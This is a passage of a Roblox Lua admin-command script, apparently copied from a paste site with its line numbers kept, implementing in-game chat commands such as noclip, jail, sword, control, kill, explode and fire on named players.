  1948.  
  1949. 650.local plrz = GetPlr(plr, msg:lower():sub(8))
  1950.  
  1951.  
  1952. 651.for i, v in pairs(plrz) do
  1953.  
  1954.  
  1955. 652.coroutine.resume(coroutine.create(function()
  1956.  
  1957.  
  1958. 653.if v and v:findFirstChild("PlayerGui") and v.Character then
  1959.  
  1960.  
  1961. 654.for a,cp in pairs(v.Character:children()) do if cp.Name == "EpicCape" then cp:Destroy() end end
  1962.  
  1963.  
  1964. 655.end
  1965.  
  1966.  
  1967. 656.end))
  1968.  
  1969.  
  1970. 657.end
  1971.  
  1972.  
  1973. 658.end
  1974.  
  1975.  
  1976. 659.
  1977.  
  1978.  
  1979. 660.if msg:lower():sub(1,7) == "noclip " then
  1980.  
  1981.  
  1982. 661.local plrz = GetPlr(plr, msg:lower():sub(8))
  1983.  
  1984.  
  1985. 662.for i, v in pairs(plrz) do
  1986.  
  1987.  
  1988. 663.coroutine.resume(coroutine.create(function()
  1989.  
  1990.  
  1991. 664.if v and v:findFirstChild("PlayerGui") then
  1992.  
  1993.  
  1994. 665.local cl = script.LocalScriptBase:Clone() cl.Name = "NoClip" cl.Code.Value = [[repeat wait(1/44) until game.Players.LocalPlayer and game.Players.LocalPlayer.Character and game.Players.LocalPlayer.Character:findFirstChild("Humanoid") and game.Players.LocalPlayer.Character:findFirstChild("Torso") and game.Players.LocalPlayer:GetMouse() and game.Workspace.CurrentCamera local mouse = game.Players.LocalPlayer:GetMouse() local torso = game.Players.LocalPlayer.Character.Torso local dir = {w = 0, s = 0, a = 0, d = 0} local spd = 2 mouse.KeyDown:connect(function(key) if key:lower() == "w" then dir.w = 1 elseif key:lower() == "s" then dir.s = 1 elseif key:lower() == "a" then dir.a = 1 elseif key:lower() == "d" then dir.d = 1 elseif key:lower() == "q" then spd = spd + 1 elseif key:lower() == "e" then spd = spd - 1 end end) mouse.KeyUp:connect(function(key) if key:lower() == "w" then dir.w = 0 elseif key:lower() == "s" then dir.s = 0 elseif key:lower() == "a" then dir.a = 0 elseif key:lower() == "d" then dir.d = 0 end end) torso.Anchored = true game.Players.LocalPlayer.Character.Humanoid.PlatformStand = true game.Players.LocalPlayer.Character.Humanoid.Changed:connect(function() game.Players.LocalPlayer.Character.Humanoid.PlatformStand = true end) repeat wait(1/44) torso.CFrame = CFrame.new(torso.Position, game.Workspace.CurrentCamera.CoordinateFrame.p) * CFrame.Angles(0,math.rad(180),0) * CFrame.new((dir.d-dir.a)*spd,0,(dir.s-dir.w)*spd) until nil]]
  1995.  
  1996.  
  1997. 666.cl.Parent = v.PlayerGui cl.Disabled = false
  1998.  
  1999.  
  2000. 667.end
  2001.  
  2002.  
  2003. 668.end))
  2004.  
  2005.  
  2006. 669.end
  2007.  
  2008.  
  2009. 670.end
  2010.  
  2011.  
  2012. 671.
  2013.  
  2014.  
  2015. 672.if msg:lower():sub(1,5) == "clip " then
  2016.  
  2017.  
  2018. 673.local plrz = GetPlr(plr, msg:lower():sub(6))
  2019.  
  2020.  
  2021. 674.for i, v in pairs(plrz) do
  2022.  
  2023.  
  2024. 675.coroutine.resume(coroutine.create(function()
  2025.  
  2026.  
  2027. 676.if v and v:findFirstChild("PlayerGui") and v.Character and v.Character:findFirstChild("Torso") and v.Character:findFirstChild("Humanoid") then
  2028.  
  2029.  
  2030. 677.for a, q in pairs(v.PlayerGui:children()) do if q.Name == "NoClip" then q:Destroy() end end
  2031.  
  2032.  
  2033. 678.v.Character.Torso.Anchored = false
  2034.  
  2035.  
  2036. 679.wait(.1) v.Character.Humanoid.PlatformStand = false
  2037.  
  2038.  
  2039. 680.end
  2040.  
  2041.  
  2042. 681.end))
  2043.  
  2044.  
  2045. 682.end
  2046.  
  2047.  
  2048. 683.end
  2049.  
  2050.  
  2051. 684.
  2052.  
  2053.  
  2054. 685.if msg:lower():sub(1,5) == "jail " then
  2055.  
  2056.  
  2057. 686.local plrz = GetPlr(plr, msg:lower():sub(6))
  2058.  
  2059.  
  2060. 687.for i, v in pairs(plrz) do
  2061.  
  2062.  
  2063. 688.coroutine.resume(coroutine.create(function()
  2064.  
  2065.  
  2066. 689.if v and v.Character and v.Character:findFirstChild("Torso") then
  2067.  
  2068.  
  2069. 690.local vname = v.Name
  2070.  
  2071.  
  2072. 691.local cf = v.Character.Torso.CFrame + Vector3.new(0,1,0)
  2073.  
  2074.  
  2075. 692.local mod = Instance.new("Model", game.Workspace) table.insert(objects, mod) mod.Name = v.Name .. " Jail"
  2076.  
  2077.  
  2078. 693.local top = Instance.new("Part", mod) top.Locked = true top.formFactor = "Symmetric" top.Size = Vector3.new(6,1,6) top.TopSurface = 0 top.BottomSurface = 0 top.Anchored = true top.BrickColor = BrickColor.new("Really black") top.CFrame = cf * CFrame.new(0,-3.5,0)
  2079.  
  2080.  
  2081. 694.v.CharacterAdded:connect(function() if not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  2082.  
  2083.  
  2084. 695.v.Changed:connect(function(p) if p ~= "Character" or not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  2085.  
  2086.  
  2087. 696.game.Players.PlayerAdded:connect(function(plr) if plr.Name == vname then v = plr end
  2088.  
  2089.  
  2090. 697.v.CharacterAdded:connect(function() if not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  2091.  
  2092.  
  2093. 698.v.Changed:connect(function(p) if p ~= "Character" or not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  2094.  
  2095.  
  2096. 699.end)
  2097.  
  2098.  
  2099. 700.local bottom = top:Clone() bottom.Parent = mod bottom.CFrame = cf * CFrame.new(0,3.5,0)
  2100.  
  2101.  
  2102. 701.local front = top:Clone() front.Transparency = .5 front.Reflectance = .1 front.Parent = mod front.Size = Vector3.new(6,6,1) front.CFrame = cf * CFrame.new(0,0,-3)
  2103.  
  2104.  
  2105. 702.local back = front:Clone() back.Parent = mod back.CFrame = cf * CFrame.new(0,0,3)
  2106.  
  2107.  
  2108. 703.local right = front:Clone() right.Parent = mod right.Size = Vector3.new(1,6,6) right.CFrame = cf * CFrame.new(3,0,0)
  2109.  
  2110.  
  2111. 704.local left = right:Clone() left.Parent = mod left.CFrame = cf * CFrame.new(-3,0,0)
  2112.  
  2113.  
  2114. 705.local msh = Instance.new("BlockMesh", front) msh.Scale = Vector3.new(1,1,0)
  2115.  
  2116.  
  2117. 706.local msh2 = msh:Clone() msh2.Parent = back
  2118.  
  2119.  
  2120. 707.local msh3 = msh:Clone() msh3.Parent = right msh3.Scale = Vector3.new(0,1,1)
  2121.  
  2122.  
  2123. 708.local msh4 = msh3:Clone() msh4.Parent = left
  2124.  
  2125.  
  2126. 709.v.Character.Torso.CFrame = cf
  2127.  
  2128.  
  2129. 710.end
  2130.  
  2131.  
  2132. 711.end))
  2133.  
  2134.  
  2135. 712.end
  2136.  
  2137.  
  2138. 713.end
  2139.  
  2140.  
  2141. 714.
  2142.  
  2143.  
  2144. 715.if msg:lower():sub(1,7) == "unjail " then
  2145.  
  2146.  
  2147. 716.local plrz = GetPlr(plr, msg:lower():sub(8))
  2148.  
  2149.  
  2150. 717.for i, v in pairs(plrz) do coroutine.resume(coroutine.create(function() if v then for a, jl in pairs(game.Workspace:children()) do if jl.Name == v.Name .. " Jail" then jl:Destroy() end end end end)) end
  2151.  
  2152.  
  2153. 718.end
  2154.  
  2155.  
  2156. 719.
  2157.  
  2158.  
  2159. 720.if msg:lower():sub(1,11) == "starttools " then
  2160.  
  2161.  
  2162. 721.local plrz = GetPlr(plr, msg:lower():sub(12))
  2163.  
  2164.  
  2165. 722.for i, v in pairs(plrz) do
  2166.  
  2167.  
  2168. 723.coroutine.resume(coroutine.create(function()
  2169.  
  2170.  
  2171. 724.if v and v:findFirstChild("Backpack") then
  2172.  
  2173.  
  2174. 725.for a,q in pairs(game.StarterPack:children()) do q:Clone().Parent = v.Backpack end
  2175.  
  2176.  
  2177. 726.end
  2178.  
  2179.  
  2180. 727.end))
  2181.  
  2182.  
  2183. 728.end
  2184.  
  2185.  
  2186. 729.end
  2187.  
  2188.  
  2189. 730.
  2190.  
  2191.  
  2192. 731.if msg:lower():sub(1,6) == "sword " then
  2193.  
  2194.  
  2195. 732.local plrz = GetPlr(plr, msg:lower():sub(7))
  2196.  
  2197.  
  2198. 733.for i, v in pairs(plrz) do
  2199.  
  2200.  
  2201. 734.coroutine.resume(coroutine.create(function()
  2202.  
  2203.  
  2204. 735.if v and v:findFirstChild("Backpack") then
  2205.  
  2206.  
  2207. 736.local sword = Instance.new("Tool", v.Backpack) sword.Name = "Sword" sword.TextureId = "rbxasset://Textures/Sword128.png"
  2208.  
  2209.  
  2210. 737.sword.GripForward = Vector3.new(-1,0,0)
  2211.  
  2212.  
  2213. 738.sword.GripPos = Vector3.new(0,0,-1.5)
  2214.  
  2215.  
  2216. 739.sword.GripRight = Vector3.new(0,1,0)
  2217.  
  2218.  
  2219. 740.sword.GripUp = Vector3.new(0,0,1)
  2220.  
  2221.  
  2222. 741.local handle = Instance.new("Part", sword) handle.Name = "Handle" handle.FormFactor = "Plate" handle.Size = Vector3.new(1,.8,4) handle.TopSurface = 0 handle.BottomSurface = 0
  2223.  
  2224.  
  2225. 742.local msh = Instance.new("SpecialMesh", handle) msh.MeshId = "rbxasset://fonts/sword.mesh" msh.TextureId = "rbxasset://textures/SwordTexture.png"
  2226.  
  2227.  
  2228. 743.local cl = script.LocalScriptBase:Clone() cl.Parent = sword cl.Code.Value = [[
  2229.  
  2230.  
  2231. 744.repeat wait() until game.Players.LocalPlayer and game.Players.LocalPlayer.Character and game.Players.LocalPlayer.Character:findFirstChild("Humanoid")
  2232.  
  2233.  
  2234. 745.local Damage = 15
  2235.  
  2236.  
  2237. 746.local SlashSound = Instance.new("Sound", script.Parent.Handle)
  2238.  
  2239.  
  2240. 747.SlashSound.SoundId = "rbxasset://sounds\\swordslash.wav"
  2241.  
  2242.  
  2243. 748.SlashSound.Volume = 1
  2244.  
  2245.  
  2246. 749.local LungeSound = Instance.new("Sound", script.Parent.Handle)
  2247.  
  2248.  
  2249. 750.LungeSound.SoundId = "rbxasset://sounds\\swordlunge.wav"
  2250.  
  2251.  
  2252. 751.LungeSound.Volume = 1
  2253.  
  2254.  
  2255. 752.local UnsheathSound = Instance.new("Sound", script.Parent.Handle)
  2256.  
  2257.  
  2258. 753.UnsheathSound.SoundId = "rbxasset://sounds\\unsheath.wav"
  2259.  
  2260.  
  2261. 754.UnsheathSound.Volume = 1
  2262.  
  2263.  
  2264. 755.local last = 0
  2265.  
  2266.  
  2267. 756.script.Parent.Handle.Touched:connect(function(hit)
  2268.  
  2269.  
  2270. 757.if hit and hit.Parent and hit.Parent:findFirstChild("Humanoid") and game.Players:findFirstChild(hit.Parent.Name) and game.Players.LocalPlayer.Character.Humanoid.Health > 0 and hit.Parent.Humanoid ~= game.Players.LocalPlayer.Character.Humanoid then
  2271.  
  2272.  
  2273. 758.local tag = Instance.new("ObjectValue", hit.Parent.Humanoid) tag.Value = plr1 tag.Name = "creator" game:service("Debris"):AddItem(tag, 3)
  2274.  
  2275.  
  2276. 759.hit.Parent.Humanoid:TakeDamage(Damage)
  2277.  
  2278.  
  2279. 760.end
  2280.  
  2281.  
  2282. 761.end)
  2283.  
  2284.  
  2285. 762.script.Parent.Activated:connect(function()
  2286.  
  2287.  
  2288. 763.if not script.Parent.Enabled or game.Players.LocalPlayer.Character.Humanoid.Health <= 0 then return end
  2289.  
  2290.  
  2291. 764.script.Parent.Enabled = false
  2292.  
  2293.  
  2294. 765.local tick = game:service("RunService").Stepped:wait()
  2295.  
  2296.  
  2297. 766.if tick - last <= .2 then
  2298.  
  2299.  
  2300. 767.LungeSound:play()
  2301.  
  2302.  
  2303. 768.local lunge = Instance.new("StringValue", script.Parent) lunge.Name = "toolanim" lunge.Value = "Lunge"
  2304.  
  2305.  
  2306. 769.local frc = Instance.new("BodyVelocity", game.Players.LocalPlayer.Character.Torso) frc.Name = "SwordForce" frc.velocity = Vector3.new(0,10,0)
  2307.  
  2308.  
  2309. 770.wait(.2)
  2310.  
  2311.  
  2312. 771.script.Parent.GripForward = Vector3.new(0,0,1)
  2313.  
  2314.  
  2315. 772.script.Parent.GripRight = Vector3.new(0,-1,0)
  2316.  
  2317.  
  2318. 773.script.Parent.GripUp = Vector3.new(-1,0,0)
  2319.  
  2320.  
  2321. 774.wait(.3)
  2322.  
  2323.  
  2324. 775.frc:Destroy() wait(.5)
  2325.  
  2326.  
  2327. 776.script.Parent.GripForward = Vector3.new(-1,0,0)
  2328.  
  2329.  
  2330. 777.script.Parent.GripRight = Vector3.new(0,1,0)
  2331.  
  2332.  
  2333. 778.script.Parent.GripUp = Vector3.new(0,0,1)
  2334.  
  2335.  
  2336. 779.else
  2337.  
  2338.  
  2339. 780.SlashSound:play()
  2340.  
  2341.  
  2342. 781.local slash = Instance.new("StringValue", script.Parent) slash.Name = "toolanim" slash.Value = "Slash"
  2343.  
  2344.  
  2345. 782.end
  2346.  
  2347.  
  2348. 783.last = tick
  2349.  
  2350.  
  2351. 784.script.Parent.Enabled = true
  2352.  
  2353.  
  2354. 785.end)
  2355.  
  2356.  
  2357. 786.script.Parent.Equipped:connect(function(mouse)
  2358.  
  2359.  
  2360. 787.for i,v in pairs(game.Players.LocalPlayer.Character.Torso:children()) do if v.Name == "SwordForce" then v:Destroy() end end
  2361.  
  2362.  
  2363. 788.UnsheathSound:play()
  2364.  
  2365.  
  2366. 789.script.Parent.Enabled = true
  2367.  
  2368.  
  2369. 790.if not mouse then return end
  2370.  
  2371.  
  2372. 791.mouse.Icon = "http://www.roblox.com/asset/?id=103593352"
  2373.  
  2374.  
  2375. 792.end)]] cl.Disabled = false
  2376.  
  2377.  
  2378. 793.end
  2379.  
  2380.  
  2381. 794.end))
  2382.  
  2383.  
  2384. 795.end
  2385.  
  2386.  
  2387. 796.end
  2388.  
  2389.  
  2390. 797.
  2391.  
  2392.  
  2393. 798.if msg:lower():sub(1,6) == "clone " then
  2394.  
  2395.  
  2396. 799.local plrz = GetPlr(plr, msg:lower():sub(7))
  2397.  
  2398.  
  2399. 800.for i, v in pairs(plrz) do
  2400.  
  2401.  
  2402. 801.coroutine.resume(coroutine.create(function()
  2403.  
  2404.  
  2405. 802.if v and v.Character then
  2406.  
  2407.  
  2408. 803.v.Character.Archivable = true
  2409.  
  2410.  
  2411. 804.local cl = v.Character:Clone()
  2412.  
  2413.  
  2414. 805.table.insert(objects,cl)
  2415.  
  2416.  
  2417. 806.cl.Parent = game.Workspace
  2418.  
  2419.  
  2420. 807.cl:MoveTo(v.Character:GetModelCFrame().p)
  2421.  
  2422.  
  2423. 808.cl:MakeJoints()
  2424.  
  2425.  
  2426. 809.v.Character.Archivable = false
  2427.  
  2428.  
  2429. 810.end
  2430.  
  2431.  
  2432. 811.end))
  2433.  
  2434.  
  2435. 812.end
  2436.  
  2437.  
  2438. 813.end
  2439.  
  2440.  
  2441. 814.
  2442.  
  2443.  
  2444. 815.if msg:lower():sub(1,8) == "control " then
  2445.  
  2446.  
  2447. 816.local plrz = GetPlr(plr, msg:lower():sub(9))
  2448.  
  2449.  
  2450. 817.for i, v in pairs(plrz) do
  2451.  
  2452.  
  2453. 818.coroutine.resume(coroutine.create(function()
  2454.  
  2455.  
  2456. 819.if v and v.Character then
  2457.  
  2458.  
  2459. 820.v.Character.Humanoid.PlatformStand = true
  2460.  
  2461.  
  2462. 821.local w = Instance.new("Weld", plr.Character.Torso )
  2463.  
  2464.  
  2465. 822.w.Part0 = plr.Character.Torso
  2466.  
  2467.  
  2468. 823.w.Part1 = v.Character.Torso
  2469.  
  2470.  
  2471. 824.local w2 = Instance.new("Weld", plr.Character.Head)
  2472.  
  2473.  
  2474. 825.w2.Part0 = plr.Character.Head
  2475.  
  2476.  
  2477. 826.w2.Part1 = v.Character.Head
  2478.  
  2479.  
  2480. 827.local w3 = Instance.new("Weld", plr.Character:findFirstChild("Right Arm"))
  2481.  
  2482.  
  2483. 828.w3.Part0 = plr.Character:findFirstChild("Right Arm")
  2484.  
  2485.  
  2486. 829.w3.Part1 = v.Character:findFirstChild("Right Arm")
  2487.  
  2488.  
  2489. 830.local w4 = Instance.new("Weld", plr.Character:findFirstChild("Left Arm"))
  2490.  
  2491.  
  2492. 831.w4.Part0 = plr.Character:findFirstChild("Left Arm")
  2493.  
  2494.  
  2495. 832.w4.Part1 = v.Character:findFirstChild("Left Arm")
  2496.  
  2497.  
  2498. 833.local w5 = Instance.new("Weld", plr.Character:findFirstChild("Right Leg"))
  2499.  
  2500.  
  2501. 834.w5.Part0 = plr.Character:findFirstChild("Right Leg")
  2502.  
  2503.  
  2504. 835.w5.Part1 = v.Character:findFirstChild("Right Leg")
  2505.  
  2506.  
  2507. 836.local w6 = Instance.new("Weld", plr.Character:findFirstChild("Left Leg"))
  2508.  
  2509.  
  2510. 837.w6.Part0 = plr.Character:findFirstChild("Left Leg")
  2511.  
  2512.  
  2513. 838.w6.Part1 = v.Character:findFirstChild("Left Leg")
  2514.  
  2515.  
  2516. 839.plr.Character.Head.face:Destroy()
  2517.  
  2518.  
  2519. 840.for i, p in pairs(v.Character:children()) do
  2520.  
  2521.  
  2522. 841.if p:IsA("BasePart") then
  2523.  
  2524.  
  2525. 842.p.CanCollide = false
  2526.  
  2527.  
  2528. 843.end
  2529.  
  2530.  
  2531. 844.end
  2532.  
  2533.  
  2534. 845.for i, p in pairs(plr.Character:children()) do
  2535.  
  2536.  
  2537. 846.if p:IsA("BasePart") then
  2538.  
  2539.  
  2540. 847.p.Transparency = 1
  2541.  
  2542.  
  2543. 848.elseif p:IsA("Hat") then
  2544.  
  2545.  
  2546. 849.p:Destroy()
  2547.  
  2548.  
  2549. 850.end
  2550.  
  2551.  
  2552. 851.end
  2553.  
  2554.  
  2555. 852.v.Character.Parent = plr.Character
  2556.  
  2557.  
  2558. 853.v.Character.Humanoid.Changed:connect(function() v.Character.Humanoid.PlatformStand = true end)
  2559.  
  2560.  
  2561. 854.end
  2562.  
  2563.  
  2564. 855.end))
  2565.  
  2566.  
  2567. 856.end
  2568.  
  2569.  
  2570. 857.end
  2571.  
  2572.  
  2573. 858.
  2574.  
  2575.  
  2576. 859.if msg:lower():sub(1,5) == "kill " then
  2577.  
  2578.  
  2579. 860.local plrz = GetPlr(plr, msg:lower():sub(6))
  2580.  
  2581.  
  2582. 861.for i, v in pairs(plrz) do
  2583.  
  2584.  
  2585. 862.coroutine.resume(coroutine.create(function()
  2586.  
  2587.  
  2588. 863.if v and v.Character then v.Character:BreakJoints() end
  2589.  
  2590.  
  2591. 864.end))
  2592.  
  2593.  
  2594. 865.end
  2595.  
  2596.  
  2597. 866.end
  2598.  
  2599.  
  2600. 867.
  2601.  
  2602.  
  2603. 868.if msg:lower():sub(1,8) == "respawn " then
  2604.  
  2605.  
  2606. 869.local plrz = GetPlr(plr, msg:lower():sub(9))
  2607.  
  2608.  
  2609. 870.for i, v in pairs(plrz) do
  2610.  
  2611.  
  2612. 871.coroutine.resume(coroutine.create(function()
  2613.  
  2614.  
  2615. 872.if v and v.Character then v:LoadCharacter() end
  2616.  
  2617.  
  2618. 873.end))
  2619.  
  2620.  
  2621. 874.end
  2622.  
  2623.  
  2624. 875.end
  2625.  
  2626.  
  2627. 876.
  2628.  
  2629.  
  2630. 877.if msg:lower():sub(1,5) == "trip " then
  2631.  
  2632.  
  2633. 878.local plrz = GetPlr(plr, msg:lower():sub(6))
  2634.  
  2635.  
  2636. 879.for i, v in pairs(plrz) do
  2637.  
  2638.  
  2639. 880.coroutine.resume(coroutine.create(function()
  2640.  
  2641.  
  2642. 881.if v and v.Character and v.Character:findFirstChild("Torso") then
  2643.  
  2644.  
  2645. 882.v.Character.Torso.CFrame = v.Character.Torso.CFrame * CFrame.Angles(0,0,math.rad(180))
  2646.  
  2647.  
  2648. 883.end
  2649.  
  2650.  
  2651. 884.end))
  2652.  
  2653.  
  2654. 885.end
  2655.  
  2656.  
  2657. 886.end
  2658.  
  2659.  
  2660. 887.
  2661.  
  2662.  
  2663. 888.if msg:lower():sub(1,5) == "stun " then
  2664.  
  2665.  
  2666. 889.local plrz = GetPlr(plr, msg:lower():sub(6))
  2667.  
  2668.  
  2669. 890.for i, v in pairs(plrz) do
  2670.  
  2671.  
  2672. 891.coroutine.resume(coroutine.create(function()
  2673.  
  2674.  
  2675. 892.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  2676.  
  2677.  
  2678. 893.v.Character.Humanoid.PlatformStand = true
  2679.  
  2680.  
  2681. 894.end
  2682.  
  2683.  
  2684. 895.end))
  2685.  
  2686.  
  2687. 896.end
  2688.  
  2689.  
  2690. 897.end
  2691.  
  2692.  
  2693. 898.
  2694.  
  2695.  
  2696. 899.if msg:lower():sub(1,7) == "unstun " then
  2697.  
  2698.  
  2699. 900.local plrz = GetPlr(plr, msg:lower():sub(8))
  2700.  
  2701.  
  2702. 901.for i, v in pairs(plrz) do
  2703.  
  2704.  
  2705. 902.coroutine.resume(coroutine.create(function()
  2706.  
  2707.  
  2708. 903.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  2709.  
  2710.  
  2711. 904.v.Character.Humanoid.PlatformStand = false
  2712.  
  2713.  
  2714. 905.end
  2715.  
  2716.  
  2717. 906.end))
  2718.  
  2719.  
  2720. 907.end
  2721.  
  2722.  
  2723. 908.end
  2724.  
  2725.  
  2726. 909.
  2727.  
  2728.  
  2729. 910.if msg:lower():sub(1,5) == "jump " then
  2730.  
  2731.  
  2732. 911.local plrz = GetPlr(plr, msg:lower():sub(6))
  2733.  
  2734.  
  2735. 912.for i, v in pairs(plrz) do
  2736.  
  2737.  
  2738. 913.coroutine.resume(coroutine.create(function()
  2739.  
  2740.  
  2741. 914.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  2742.  
  2743.  
  2744. 915.v.Character.Humanoid.Jump = true
  2745.  
  2746.  
  2747. 916.end
  2748.  
  2749.  
  2750. 917.end))
  2751.  
  2752.  
  2753. 918.end
  2754.  
  2755.  
  2756. 919.end
  2757.  
  2758.  
  2759. 920.
  2760.  
  2761.  
  2762. 921.if msg:lower():sub(1,4) == "sit " then
  2763.  
  2764.  
  2765. 922.local plrz = GetPlr(plr, msg:lower():sub(5))
  2766.  
  2767.  
  2768. 923.for i, v in pairs(plrz) do
  2769.  
  2770.  
  2771. 924.coroutine.resume(coroutine.create(function()
  2772.  
  2773.  
  2774. 925.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  2775.  
  2776.  
  2777. 926.v.Character.Humanoid.Sit = true
  2778.  
  2779.  
  2780. 927.end
  2781.  
  2782.  
  2783. 928.end))
  2784.  
  2785.  
  2786. 929.end
  2787.  
  2788.  
  2789. 930.end
  2790.  
  2791.  
  2792. 931.
  2793.  
  2794.  
  2795. 932.if msg:lower():sub(1,10) == "invisible " then
  2796.  
  2797.  
  2798. 933.local plrz = GetPlr(plr, msg:lower():sub(11))
  2799.  
  2800.  
  2801. 934.for i, v in pairs(plrz) do
  2802.  
  2803.  
  2804. 935.coroutine.resume(coroutine.create(function()
  2805.  
  2806.  
  2807. 936.if v and v.Character then
  2808.  
  2809.  
  2810. 937.for a, obj in pairs(v.Character:children()) do
  2811.  
  2812.  
  2813. 938.if obj:IsA("BasePart") then obj.Transparency = 1 if obj:findFirstChild("face") then obj.face.Transparency = 1 end elseif obj:IsA("Hat") and obj:findFirstChild("Handle") then obj.Handle.Transparency = 1 end
  2814.  
  2815.  
  2816. 939.end
  2817.  
  2818.  
  2819. 940.end
  2820.  
  2821.  
  2822. 941.end))
  2823.  
  2824.  
  2825. 942.end
  2826.  
  2827.  
  2828. 943.end
  2829.  
  2830.  
  2831. 944.
  2832.  
  2833.  
  2834. 945.if msg:lower():sub(1,8) == "visible " then
  2835.  
  2836.  
  2837. 946.local plrz = GetPlr(plr, msg:lower():sub(9))
  2838.  
  2839.  
  2840. 947.for i, v in pairs(plrz) do
  2841.  
  2842.  
  2843. 948.coroutine.resume(coroutine.create(function()
  2844.  
  2845.  
  2846. 949.if v and v.Character then
  2847.  
  2848.  
  2849. 950.for a, obj in pairs(v.Character:children()) do
  2850.  
  2851.  
  2852. 951.if obj:IsA("BasePart") then obj.Transparency = 0 if obj:findFirstChild("face") then obj.face.Transparency = 0 end elseif obj:IsA("Hat") and obj:findFirstChild("Handle") then obj.Handle.Transparency = 0 end
  2853.  
  2854.  
  2855. 952.end
  2856.  
  2857.  
  2858. 953.end
  2859.  
  2860.  
  2861. 954.end))
  2862.  
  2863.  
  2864. 955.end
  2865.  
  2866.  
  2867. 956.end
  2868.  
  2869.  
  2870. 957.
  2871.  
  2872.  
  2873. 958.if msg:lower():sub(1,5) == "lock " then
  2874.  
  2875.  
  2876. 959.local plrz = GetPlr(plr, msg:lower():sub(6))
  2877.  
  2878.  
  2879. 960.for i, v in pairs(plrz) do
  2880.  
  2881.  
  2882. 961.coroutine.resume(coroutine.create(function()
  2883.  
  2884.  
  2885. 962.if v and v.Character then
  2886.  
  2887.  
  2888. 963.for a, obj in pairs(v.Character:children()) do
  2889.  
  2890.  
  2891. 964.if obj:IsA("BasePart") then obj.Locked = true elseif obj:IsA("Hat") and obj:findFirstChild("Handle") then obj.Handle.Locked = true end
  2892.  
  2893.  
  2894. 965.end
  2895.  
  2896.  
  2897. 966.end
  2898.  
  2899.  
  2900. 967.end))
  2901.  
  2902.  
  2903. 968.end
  2904.  
  2905.  
  2906. 969.end
  2907.  
  2908.  
  2909. 970.
  2910.  
  2911.  
  2912. 971.if msg:lower():sub(1,7) == "unlock " then
  2913.  
  2914.  
  2915. 972.local plrz = GetPlr(plr, msg:lower():sub(8))
  2916.  
  2917.  
  2918. 973.for i, v in pairs(plrz) do
  2919.  
  2920.  
  2921. 974.coroutine.resume(coroutine.create(function()
  2922.  
  2923.  
  2924. 975.if v and v.Character then
  2925.  
  2926.  
  2927. 976.for a, obj in pairs(v.Character:children()) do
  2928.  
  2929.  
  2930. 977.if obj:IsA("BasePart") then obj.Locked = false elseif obj:IsA("Hat") and obj:findFirstChild("Handle") then obj.Handle.Locked = false end
  2931.  
  2932.  
  2933. 978.end
  2934.  
  2935.  
  2936. 979.end
  2937.  
  2938.  
  2939. 980.end))
  2940.  
  2941.  
  2942. 981.end
  2943.  
  2944.  
  2945. 982.end
  2946.  
  2947.  
  2948. 983.
  2949.  
  2950.  
  2951. 984.if msg:lower():sub(1,8) == "explode " then
  2952.  
  2953.  
  2954. 985.local plrz = GetPlr(plr, msg:lower():sub(9))
  2955.  
  2956.  
  2957. 986.for i, v in pairs(plrz) do
  2958.  
  2959.  
  2960. 987.coroutine.resume(coroutine.create(function()
  2961.  
  2962.  
  2963. 988.if v and v.Character and v.Character:findFirstChild("Torso") then
  2964.  
  2965.  
  2966. 989.local ex = Instance.new("Explosion", game.Workspace) ex.Position = v.Character.Torso.Position
  2967.  
  2968.  
  2969. 990.end
  2970.  
  2971.  
  2972. 991.end))
  2973.  
  2974.  
  2975. 992.end
  2976.  
  2977.  
  2978. 993.end
  2979.  
  2980.  
  2981. 994.
  2982.  
  2983.  
  2984. 995.if msg:lower():sub(1,4) == "age " then
  2985.  
  2986.  
  2987. 996.local plrz = GetPlr(plr, msg:lower():sub(5))
  2988.  
  2989.  
  2990. 997.for i, v in pairs(plrz) do
  2991.  
  2992.  
  2993. 998.coroutine.resume(coroutine.create(function()
  2994.  
  2995.  
  2996. 999.if v then Message(v.Name .. "'s age", tostring(v.AccountAge), false, {plr}) end
  2997.  
  2998.  
  2999. 1000.end))
  3000.  
  3001.  
  3002. 1001.end
  3003.  
  3004.  
  3005. 1002.end
  3006.  
  3007.  
  3008. 1003.
  3009.  
  3010.  
  3011. 1004.if msg:lower():sub(1,5) == "fire " then
  3012.  
  3013.  
  3014. 1005.local plrz = GetPlr(plr, msg:lower():sub(6))
  3015.  
  3016.  
  3017. 1006.for i, v in pairs(plrz) do
  3018.  
  3019.  
  3020. 1007.coroutine.resume(coroutine.create(function()
  3021.  
  3022.  
  3023. 1008.if v and v.Character and v.Character:findFirstChild("Torso") then
  3024.  
  3025.  
  3026. 1009.local cl = Instance.new("Fire", v.Character.Torso) table.insert(objects, cl)
  3027.  
  3028.  
  3029. 1010.end
  3030.  
  3031.  
  3032. 1011.end))
  3033.  
  3034.  
  3035. 1012.end
  3036.  
  3037.  
  3038. 1013.end
  3039.  
  3040.  
  3041. 1014.
  3042.  
  3043.  
  3044. 1015.if msg:lower():sub(1,7) == "unfire " then
  3045.  
  3046.  
  3047. 1016.local plrz = GetPlr(plr, msg:lower():sub(8))
  3048.  
  3049.  
  3050. 1017.for i, v in pairs(plrz) do
  3051.  
  3052.  
  3053. 1018.coroutine.resume(coroutine.create(function()
  3054.  
  3055.  
  3056. 1019.if v and v.Character and v.Character:findFirstChild("Torso") then
  3057.  
  3058.  
  3059. 1020.for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Fire") then cl:Destroy() end end
  3060.  
  3061.  
  3062. 1021.end
  3063.  
  3064.  
  3065. 1022.end))
  3066.  
  3067.  
  3068. 1023.end
  3069.  
  3070.  
  3071. 1024.end
  3072.  
  3073.  
  3074. 1025.
  3075.  
  3076.  
  3077. 1026.if msg:lower():sub(1,6) == "smoke " then
  3078.  
  3079.  
  3080. 1027.local plrz = GetPlr(plr, msg:lower():sub(7))
  3081.  
  3082.  
  3083. 1028.for i, v in pairs(plrz) do
